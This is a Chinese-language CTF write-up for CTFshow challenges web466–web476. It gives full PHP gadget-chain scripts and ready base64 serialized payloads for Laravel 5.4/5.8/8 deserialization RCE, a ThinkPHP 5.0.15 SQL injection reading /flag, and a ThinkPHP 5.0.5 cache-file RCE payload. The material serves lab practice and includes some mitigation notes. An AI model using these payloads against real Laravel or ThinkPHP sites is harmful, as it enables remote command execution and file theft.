CTFSHOW 框架复现 web466 - web476


web466

参考文章:代码审计学习—Laravel5.4

做题前一定要先看一遍漏洞复现,自行跟着去验证一下

第一条链子因为 Faker\Generator.php 里有个 __wakeup(),反序列化时会把 formatters 数组清空,所以用不了

所以这里我们用第二条链子

<?php
namespace Illuminate\Validation {
    // Local stand-in for the framework class of the same name. It declares only
    // the single property that appears in the serialized output, so the script
    // runs without Laravel installed. Property name, visibility and declaration
    // order determine the exact bytes serialize() emits, which is why the base64
    // quoted below only matches this exact declaration.
    class Validator {
        public $extensions = [];
        public function __construct() {
            // The only content: a map from the empty-string key to the name of a
            // PHP function. Nothing is executed by this script; serialize()
            // merely records the array as data.
            $this->extensions = ['' => 'system'];
        }
    }
}

namespace Illuminate\Broadcasting {
    use Illuminate\Validation\Validator;
    // Outer object of the payload: carries the Validator stand-in in $events and
    // the command string in $event. Both properties are protected, so serialize()
    // prefixes their names with "\0*\0"; declaring them public would change the
    // output and the base64 quoted below would no longer match.
    class PendingBroadcast {
        protected $events;
        protected $event;
        /**
         * @param string $cmd stored verbatim in $event; this script never runs it
         */
        public function __construct($cmd)
        {
            $this->events = new Validator();
            $this->event = $cmd;
        }
    }
    // Emit the object graph base64-encoded so it survives being passed in a URL.
    // Defender's note: the application is only affected because it hands this
    // GET parameter to unserialize(); untrusted input should be decoded with
    // json_decode() instead, and objects should never be reconstructed from it.
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>

运行得到结果

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MzE6IklsbHVtaW5hdGVcVmFsaWRhdGlvblxWYWxpZGF0b3IiOjE6e3M6MTA6ImV4dGVuc2lvbnMiO2E6MTp7czowOiIiO3M6Njoic3lzdGVtIjt9fXM6ODoiACoAZXZlbnQiO3M6OToiY2F0IC9mbGFnIjt9

然后GET传入/admin/序列化数据即可

web467

参考文章:Laravel5.4 反序列化漏洞挖掘

这里面第一条链子和第二条链子在题目里面用不了

用第三条链子

<?php
namespace Illuminate\Broadcasting
{
    use Illuminate\Events\Dispatcher;
    // Same outer object as in web466; this time $events holds the Dispatcher
    // stand-in declared further down in the file. PHP binds plain class
    // declarations at compile time, so Dispatcher is already known when the
    // echo at the end of this block runs.
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        /**
         * @param string $cmd used both as the Dispatcher's listener key and as $event
         */
        public function __construct($cmd)
        {
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        }
    }
    // The command comes from the first CLI argument ($argv is only populated
    // when PHP runs from the command line, as in `php 1.php "..."` below).
    // Run without an argument, $argv[1] is undefined and PHP emits a warning.
    echo base64_encode(serialize(new PendingBroadcast($argv[1])));
}


namespace Illuminate\Events
{
    // Stand-in for the framework's event dispatcher; only $listeners is declared
    // because it is the only property that ends up in the serialized output.
    class Dispatcher
    {
        protected $listeners;
        /**
         * @param string $event becomes the single key of $listeners; its value is
         *        a one-element list holding a PHP function name, stored as data
         */
        public function __construct($event){
            $this->listeners=[$event=>['system']];
        }
    }
}

保存文件为1.php,在终端执行命令php 1.php "cat /flag",得到结果

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086Mjg6IklsbHVtaW5hdGVcRXZlbnRzXERpc3BhdGNoZXIiOjE6e3M6MTI6IgAqAGxpc3RlbmVycyI7YToxOntzOjk6ImNhdCAvZmxhZyI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6ODoiACoAZXZlbnQiO3M6OToiY2F0IC9mbGFnIjt9

同样的,GET传入/admin/序列化数据得到flag

web468

参考文章:laravel5.4反序列化 - Shivers0x72

用第二个方法,也就是src/Illuminate/Support/Manager.php那个

<?php
namespace Illuminate\Broadcasting
{
    use Illuminate\Notifications\ChannelManager;
    // Outer object; unlike web466/467 only $events is declared, so the
    // serialized object carries a single property (the ":1:" in the output).
    class PendingBroadcast
    {
        protected $events;
        /**
         * @param string $cmd passed through to the ChannelManager stand-in
         */
        public function __construct($cmd)
        {
            $this->events = new ChannelManager($cmd);
        }
    }
    $seri = new PendingBroadcast('cat /flag');
    // base64 so the result can be passed as a GET parameter.
    echo base64_encode(serialize($seri));
}

namespace Illuminate\Notifications
{
    // Stand-in for the framework's ChannelManager with the three properties
    // that appear in the serialized output.
    class ChannelManager
    {
        protected $app;
        protected $defaultChannel;
        protected $customCreators;
        /**
         * @param string $cmd stored in $app as plain data
         */
        public function __construct($cmd)
        {
            $this->defaultChannel = '1';
            // PHP normalizes the numeric-string key '1' to the integer 1, which is
            // why the serialized output below shows the key as i:1 rather than
            // s:1:"1".
            $this->customCreators = array('1' => 'system');
            $this->app = $cmd;
        }
    }
}
?>

得到结果

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6Mzp7czo2OiIAKgBhcHAiO3M6OToiY2F0IC9mbGFnIjtzOjE3OiIAKgBkZWZhdWx0Q2hhbm5lbCI7czoxOiIxIjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntpOjE7czo2OiJzeXN0ZW0iO319fQ==

运行后会弹出一个调试页面,报错的大意是:代码尝试对一个字符串类型的变量调用 dispatch() 方法,而字符串并没有这个方法,于是抛出错误

这不影响命令执行,直接查看网页源码即可

web469

也是参考上一题的文章:laravel5.4反序列化 - Shivers0x72

用最后一个方法,也就是src/Faker/ValidGenerator.php那个

<?php
namespace Illuminate\Broadcasting
{
    use Faker\ValidGenerator;
    // Outer object; $events now carries the Faker ValidGenerator stand-in
    // declared in the next namespace block.
    class PendingBroadcast
    {
        protected $events;
        /**
         * @param string $cmd passed through to ValidGenerator
         */
        public function __construct($cmd)
        {
            $this->events = new ValidGenerator($cmd);
        }
    }
    $seri = new PendingBroadcast('cat /flag');
    // base64 so the result can be passed as a GET parameter.
    echo base64_encode(serialize($seri));
}

namespace Faker
{
    // Redundant import: DefaultGenerator lives in this same namespace, so the
    // use statement is harmless but unnecessary.
    use Faker\DefaultGenerator;
    // Stand-in for Faker's ValidGenerator with the three serialized properties.
    class ValidGenerator
    {
        protected $maxRetries;
        protected $validator;
        protected $generator;
        /**
         * @param string $cmd handed to the DefaultGenerator stand-in
         */
        public function __construct($cmd)
        {
            // DefaultGenerator is declared in the following namespace block; PHP
            // binds plain class declarations at compile time, so this resolves.
            $this->generator = new DefaultGenerator($cmd);
            $this->maxRetries = 10000000;
            // Function name stored as a plain string; nothing is called here.
            $this->validator = 'system';
        }

    }
}

namespace Faker
{
    // Stand-in for Faker's DefaultGenerator; only $default is serialized.
    class DefaultGenerator
    {
        protected $default;
        /**
         * @param string $cmd stored verbatim in $default
         */
        public function __construct($cmd)
        {
            $this->default = $cmd;
        }
    }
}
?>

得到结果

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEzOiIAKgBtYXhSZXRyaWVzIjtpOjEwMDAwMDAwO3M6MTI6IgAqAHZhbGlkYXRvciI7czo2OiJzeXN0ZW0iO3M6MTI6IgAqAGdlbmVyYXRvciI7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7czo5OiJjYXQgL2ZsYWciO319fQ==

web470

跟上题方法一样,传入

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEzOiIAKgBtYXhSZXRyaWVzIjtpOjEwMDAwMDAwO3M6MTI6IgAqAHZhbGlkYXRvciI7czo2OiJzeXN0ZW0iO3M6MTI6IgAqAGdlbmVyYXRvciI7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7czo5OiJjYXQgL2ZsYWciO319fQ==

得到flag

web471

参考文章:laravel5.8 反序列化漏洞复现

用方法一,但是最后的输出要改一下,改成base64编码

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    // Outer object; both nested stand-ins below carry their values as property
    // defaults, so no constructor arguments are needed in this version.
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    // Stand-in with a single public property; the command string is a
    // hard-coded default here rather than a constructor argument.
    class QueuedCommand
    {
        public $connection="cat /flag";
    }
}
namespace Illuminate\Bus{
    // Stand-in for the bus dispatcher; $queueResolver holds a PHP function
    // name as a plain string default.
    class Dispatcher
    {
        protected $queueResolver="system";

    }
}
namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    // Global namespace block: serialize the graph and base64-encode it so it can
    // be passed in a URL (the referenced article's version prints it differently,
    // which is the "改成base64编码" change mentioned above).
    echo base64_encode(serialize(new PendingBroadcast()));
}

运行得到结果

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9czo4OiIAKgBldmVudCI7Tzo0MzoiSWxsdW1pbmF0ZVxGb3VuZGF0aW9uXENvbnNvbGVcUXVldWVkQ29tbWFuZCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319

运行后会弹出调试页面,大概意思是在调用 dispatchToQueue 方法时,尝试通过队列解析器(queueResolver)来获取一个队列实例(Queue对象),但实际得到的不是实现了 Queue 接口的对象,而是其他类型(如字符串、null或其他非队列对象)

但是不影响命令执行,查看网页源码

web472

可以继续用上题的payload,也可以学学新思路,但感觉方法都差不多

版本升到laravel8了,参考文章:Laravel 8 反序列化分析_laravel dispatch

要改一下输出格式(和前面几题一样改成 base64 编码)

<?php

namespace Illuminate\Broadcasting {
    // Unused import: nothing in this block refers to the Dispatcher contract.
    use Illuminate\Contracts\Events\Dispatcher;

    // Outer object. The declaration order ($event before $events) is the reverse
    // of the earlier scripts; serialize() follows declaration order, so the
    // output below starts with the event property.
    class PendingBroadcast
    {
        protected $event;
        protected $events;

        /**
         * @param object $events the Dispatcher stand-in
         * @param object $event  the BroadcastEvent stand-in
         */
        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }
}

namespace Illuminate\Bus {
    // Stand-in for the bus dispatcher; $queueResolver is taken as a constructor
    // argument this time instead of a fixed default.
    class Dispatcher
    {
        protected $queueResolver;

        /**
         * @param string $queueResolver stored as plain data
         */
        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
    }
}

namespace Illuminate\Broadcasting {
    // Second block for this namespace (PHP allows reopening it); replaces the
    // QueuedCommand of web471 with a BroadcastEvent stand-in.
    class BroadcastEvent
    {
        public $connection;

        /**
         * @param string $connection stored verbatim
         */
        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}

namespace {
    // Global block: build the graph bottom-up and print it base64-encoded.
    // Defender's note: the server is only affected because it feeds this GET
    // parameter to unserialize(); decode untrusted input with json_decode() and
    // never reconstruct objects from it.
    $c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
    $a = new Illuminate\Bus\Dispatcher('system');
    $b = new Illuminate\Broadcasting\PendingBroadcast($a, $c);
    echo base64_encode(serialize($b));
}

得到结果

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo4OiIAKgBldmVudCI7TzozODoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcQnJvYWRjYXN0RXZlbnQiOjE6e3M6MTA6ImNvbm5lY3Rpb24iO3M6OToiY2F0IC9mbGFnIjt9czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9fQ==

同样也是GET传入/admin/序列化数据

web473

参考文章:ThinkPHP 5.0.15 SQL注入漏洞

题目给出了thinkphp5.0.15默认控制器的部分代码,使用默认路由

// Controller action quoted from the challenge (ThinkPHP 5.0.15). This is the
// vulnerable code reproduced for reference, not a pattern to copy.
public function inject(){
    // 'a/a' asks the framework to cast the parameter to an array, so a request
    // can supply a[0], a[1], a[2] instead of a plain string; that array is then
    // handed straight to insert() with no validation, which is the injection
    // point. Mitigation: accept only a scalar string here (reject arrays),
    // validate it before it reaches the query builder, and upgrade the
    // framework past the affected release.
    $a=request()->get('a/a');
    db('users')->insert(['username'=>$a]);
    return 'done';

}

然后payload要改为

?a[0]=inc&a[1]=(select load_file('/flag'))&a[2]=1

我们用兼容模式传入路径

/index.php?s=index/index/inject&a[0]=inc&a[1]=(select load_file('/flag'))&a[2]=1

兼容模式也就是 index.php?s=模块/控制器/方法&参数;当然还有 pathinfo 模式,通过 index.php/模块/控制器/方法?参数 的形式传递,但是这里我用 pathinfo 模式失败了

得到flag

web474

参考文章:Thinkphp cache缓存函数远程代码执行漏洞

题目给出thinkphp5.0.5默认控制器的部分代码,使用默认路由

// Controller action quoted from the challenge (ThinkPHP 5.0.5). Vulnerable
// code reproduced for reference, not a pattern to copy.
public function rce(){
    // input('get.cache') is raw, unvalidated GET data. As the notes below
    // describe, this cache driver persists the value into a .php file under
    // /runtime/cache that can then be requested directly, so whatever the client
    // sends is stored where it is treated as code. Mitigation: never store raw
    // request data in the file cache, keep the runtime directory out of the web
    // root, and upgrade the framework.
    Cache::set("cache",input('get.cache'));
    return 'done';
}

payload:

public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//

写入之后我们要访问文件,因为cache的md5值为0fea6a13c52b4d4725368f24b045ca84,根据文章可知,文件的存放路径为/runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php,我们拼接访问该路径

得到flag

web475

后面两题题目备注thinkphp 5.0.0-5.0.23 rce,范围很大,可以自行测试Poc,这里我直接用工具做了

下载地址:bewhale/thinkphp_gui_tools: ThinkPHP漏洞综合利用工具

先检测看存在什么类型漏洞,然后一个个尝试,扫描/public/index.php不行,要扫描目录/public

得到flag

web476

跟上面一样

作者

WayneJoon.H

发布于

2025-09-12
